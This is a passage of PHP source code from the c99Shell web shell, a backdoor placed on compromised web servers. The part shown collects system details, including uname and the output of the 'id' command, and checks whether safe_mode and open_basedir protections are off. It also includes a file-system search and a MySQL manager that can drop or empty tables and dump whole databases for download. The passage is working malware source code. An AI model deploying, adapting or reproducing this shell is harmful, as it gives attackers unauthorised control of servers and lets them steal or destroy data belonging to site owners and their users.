710 if ($sock) {return mysql_query($sql,$sock);}
711 else {return mysql_query($sql);}
712}
713}
714if (!function_exists("mysql_query_parse"))
715{
716function mysql_query_parse($query)
717{
718 $query = trim($query);
719 $arr = explode (" ",$query);
720 /*array array()
721 {
722 "METHOD"=>array(output_type),
723 "METHOD1"...
724 ...
725 }
726 if output_type == 0, no output,
727 if output_type == 1, no output if no error
728 if output_type == 2, output without control-buttons
729 if output_type == 3, output with control-buttons
730 */
731 $types = array(
732 "SELECT"=>array(3,1),
733 "SHOW"=>array(2,1),
734 "DELETE"=>array(1),
735 "DROP"=>array(1)
736 );
737 $result = array();
738 $op = strtoupper($arr[0]);
739 if (is_array($types[$op]))
740 {
741 $result["propertions"] = $types[$op];
742 $result["query"] = $query;
743 if ($types[$op] == 2)
744 {
745 foreach($arr as $k=>$v)
746 {
747 if (strtoupper($v) == "LIMIT")
748 {
749 $result["limit"] = $arr[$k+1];
750 $result["limit"] = explode(",",$result["limit"]);
751 if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
752 unset($arr[$k],$arr[$k+1]);
753 }
754 }
755 }
756 }
757 else {return FALSE;}
758}
759}
760if (!function_exists("c999fsearch"))
761{
762function c999fsearch($d)
763{
764 global $found;
765 global $found_d;
766 global $found_f;
767 global $search_i_f;
768 global $search_i_d;
769 global $a;
770 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
771 $h = opendir($d);
772 while (($f = readdir($h)) !== FALSE)
773 {
774 if($f != "." && $f != "..")
775 {
776 $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
777 if (is_dir($d.$f))
778 {
779 $search_i_d++;
780 if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
781 if (!is_link($d.$f)) {c999fsearch($d.$f);}
782 }
783 else
784 {
785 $search_i_f++;
786 if ($bool)
787 {
788 if (!empty($a["text"]))
789 {
790 $r = @file_get_contents($d.$f);
791 if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
792 if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
793 if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
794 else {$bool = strpos(" ".$r,$a["text"],1);}
795 if ($a["text_not"]) {$bool = !$bool;}
796 if ($bool) {$found[] = $d.$f; $found_f++;}
797 }
798 else {$found[] = $d.$f; $found_f++;}
799 }
800 }
801 }
802 }
803 closedir($h);
804}
805}
806if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
807//Sending headers
808@ob_start();
809@ob_implicit_flush(0);
810function onphpshutdown()
811{
812 global $gzipencode,$ft;
813 if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
814 {
815 $v = @ob_get_contents();
816 @ob_end_clean();
817 @ob_start("ob_gzHandler");
818 echo $v;
819 @ob_end_flush();
820 }
821}
822function c999shexit()
823{
824 onphpshutdown();
825 exit;
826}
827header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
828header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
829header("Cache-Control: no-store, no-cache, must-revalidate");
830header("Cache-Control: post-check=0, pre-check=0", FALSE);
831header("Pragma: no-cache");
832if (empty($tmpdir))
833{
834 $tmpdir = ini_get("upload_tmp_dir");
835 if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
836}
837$tmpdir = realpath($tmpdir);
838$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
839if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
840if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
841else {$tmpdir_logs = realpath($tmpdir_logs);}
842if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
843{
844 $safemode = TRUE;
845 $hsafemode = "<font color=red>ON (secure)</font>";
846}
847else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
848$v = @ini_get("open_basedir");
849if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
850else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
851$sort = htmlspecialchars($sort);
852if (empty($sort)) {$sort = $sort_default;}
853$sort[1] = strtolower($sort[1]);
854$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
855if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
856$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
857@ini_set("highlight.bg",$highlight_bg); //FFFFFF
858@ini_set("highlight.comment",$highlight_comment); //#FF8000
859@ini_set("highlight.default",$highlight_default); //#0000BB
860@ini_set("highlight.html",$highlight_html); //#000000
861@ini_set("highlight.keyword",$highlight_keyword); //#007700
862@ini_set("highlight.string",$highlight_string); //#DD0000
863if (!is_array($actbox)) {$actbox = array();}
864$dspact = $act = htmlspecialchars($act);
865$disp_fullpath = $ls_arr = $notls = null;
866$ud = urlencode($d);
867?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>c99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
868$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
869if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
870$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
871if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
872$d = str_replace("\\\\","\\",$d);
873$dispd = htmlspecialchars($d);
874$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
875$i = 0;
876foreach($pd as $b)
877{
878 $t = "";
879 $j = 0;
880 foreach ($e as $r)
881 {
882 $t.= $r.DIRECTORY_SEPARATOR;
883 if ($j == $i) {break;}
884 $j++;
885 }
886 echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
887 $i++;
888}
889echo "&nbsp;&nbsp;&nbsp;";
890if (is_writable($d))
891{
892 $wd = TRUE;
893 $wdt = "<font color=green>[ ok ]</font>";
894 echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
895}
896else
897{
898 $wd = FALSE;
899 $wdt = "<font color=red>[ Read-Only ]</font>";
900 echo "<b>".view_perms_color($d)."</b>";
901}
902if (is_callable("disk_free_space"))
903{
904 $free = disk_free_space($d);
905 $total = disk_total_space($d);
906 if ($free === FALSE) {$free = 0;}
907 if ($total === FALSE) {$total = 0;}
908 if ($free < 0) {$free = 0;}
909 if ($total < 0) {$total = 0;}
910 $used = $total-$free;
911 $free_percent = round(100/($total/$free),2);
912 echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
913}
914echo "<br>";
915$letters = "";
916if ($win)
917{
918 $v = explode("\\",$d);
919 $v = $v[0];
920 foreach (range("a","z") as $letter)
921 {
922 $bool = $isdiskette = in_array($letter,$safemode_diskettes);
923 if (!$bool) {$bool = is_dir($letter.":\\");}
924 if ($bool)
925 {
926 $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
927 if ($letter.":" != $v) {$letters .= $letter;}
928 else {$letters .= "<font color=green>".$letter."</font>";}
929 $letters .= " ]</a> ";
930 }
931 }
932 if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
933}
934if (count($quicklaunch) > 0)
935{
936 foreach($quicklaunch as $item)
937 {
938 $item[1] = str_replace("%d",urlencode($d),$item[1]);
939 $item[1] = str_replace("%sort",$sort,$item[1]);
940 $v = realpath($d."..");
941 if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
942 $item[1] = str_replace("%upd",urlencode($v),$item[1]);
943 echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
944 }
945}
946echo "</p></td></tr></table><br>";
947if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
948echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
949if ($act == "") {$act = $dspact = "ls";}
950if ($act == "sql")
951{
952 $sql_surl = $surl."act=sql";
953 if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
954 if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
955 if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
956 if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
957 if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
958 $sql_surl .= "&";
959 ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
960 if ($sql_server)
961 {
962 $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
963 $err = mysql_smarterror();
964 @mysql_select_db($sql_db,$sql_sock);
965 if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
966 }
967 else {$sql_sock = FALSE;}
968 echo "<b>SQL Manager:</b><br>";
969 if (!$sql_sock)
970 {
971 if (!$sql_server) {echo "NO CONNECTION";}
972 else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
973 }
974 else
975 {
976 $sqlquicklaunch = array();
977 $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
978 $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
979 $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
980 $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
981 $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
982 $sqlquicklaunch[] = array("Logout",$surl."act=sql");
983 echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
984 if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
985 echo "</center>";
986 }
987 echo "</td></tr><tr>";
988 if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
989 else
990 {
991 //Start left panel
992 if (!empty($sql_db))
993 {
994 ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
995 $result = mysql_list_tables($sql_db);
996 if (!$result) {echo mysql_smarterror();}
997 else
998 {
999 echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
1000 $c = 0;
1001 while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
1002 if (!$c) {echo "No tables found in database.";}
1003 }
1004 }
1005 else
1006 {
1007 ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
1008 $result = mysql_list_dbs($sql_sock);
1009 if (!$result) {echo mysql_smarterror();}
1010 else
1011 {
1012 ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
1013 $c = 0;
1014 $dbs = "";
1015 while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
1016 echo "<option value=\"\">Databases (".$c.")</option>";
1017 echo $dbs;
1018 }
1019 ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
1020 }
1021 //End left panel
1022 echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
1023 //Start center panel
1024 $diplay = TRUE;
1025 if ($sql_db)
1026 {
1027 if (!is_numeric($c)) {$c = 0;}
1028 if ($c == 0) {$c = "no";}
1029 echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
1030 if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
1031 echo "</b></center>";
1032 $acts = array("","dump");
1033 if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1034 elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
1035 elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
1036 elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1037 elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1038 elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1039 elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1040 elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
1041 elseif ($sql_tbl_act == "insert")
1042 {
1043 if ($sql_tbl_insert_radio == 1)
1044 {
1045 $keys = "";
1046 $akeys = array_keys($sql_tbl_insert);
1047 foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
1048 if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
1049 $values = "";
1050 $i = 0;
1051 foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
1052 if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
1053 $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
1054 $sql_act = "query";
1055 $sql_tbl_act = "browse";
1056 }
1057 elseif ($sql_tbl_insert_radio == 2)
1058 {
1059 $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
1060 $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
1061 $result = mysql_query($sql_query) or print(mysql_smarterror());
1062 $result = mysql_fetch_array($result, MYSQL_ASSOC);
1063 $sql_act = "query";
1064 $sql_tbl_act = "browse";
1065 }
1066 }
1067 if ($sql_act == "query")
1068 {
1069 echo "<hr size=\"1\" noshade>";
1070 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
1071 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
1072 if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
1073 }
1074 if (in_array($sql_act,$acts))
1075 {
1076 ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
1077 if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
1078 if ($sql_act == "newtbl")
1079 {
1080 echo "<b>";
1081 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
1082 }
1083 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
1084 }
1085 elseif ($sql_act == "dump")
1086 {
1087 if (empty($submit))
1088 {
1089 $diplay = FALSE;
1090 echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
1091 echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
1092 $v = join (";",$dmptbls);
1093 echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
1094 if ($dump_file) {$tmp = $dump_file;}
1095 else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
1096 echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
1097 echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
1098 echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
1099 echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
1100 echo "</form>";
1101 }
1102 else
1103 {
1104 $diplay = TRUE;
1105 $set = array();
1106 $set["sock"] = $sql_sock;
1107 $set["db"] = $sql_db;
1108 $dump_out = "download";
1109 $set["print"] = 0;
1110 $set["nl2br"] = 0;
1111 $set[""] = 0;
1112 $set["file"] = $dump_file;
1113 $set["add_drop"] = TRUE;
1114 $set["onlytabs"] = array();
1115 if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
1116 $ret = mysql_dump($set);
1117 if ($sql_dump_download)
1118 {
1119 @ob_clean();
1120 header("Content-type: application/octet-stream");
1121 header("Content-length: ".strlen($ret));
1122 header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
1123 echo $ret;
1124 exit;
1125 }
1126 elseif ($sql_dump_savetofile)
1127 {
1128 $fp = fopen($sql_dump_file,"w");
1129 if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
1130 else
1131 {
1132 fwrite($fp,$ret);
1133 fclose($fp);
1134 echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
1135 }
1136 }
1137 else {echo "<b>Dump: nothing to do!</b>";}
1138 }
1139 }
1140 if ($diplay)
1141 {
1142 if (!empty($sql_tbl))
1143 {
1144 if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
1145 $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
1146 $count_row = mysql_fetch_array($count);
1147 mysql_free_result($count);
1148 $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
1149 $tbl_struct_fields = array();
1150 while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
1151 if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
1152 if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
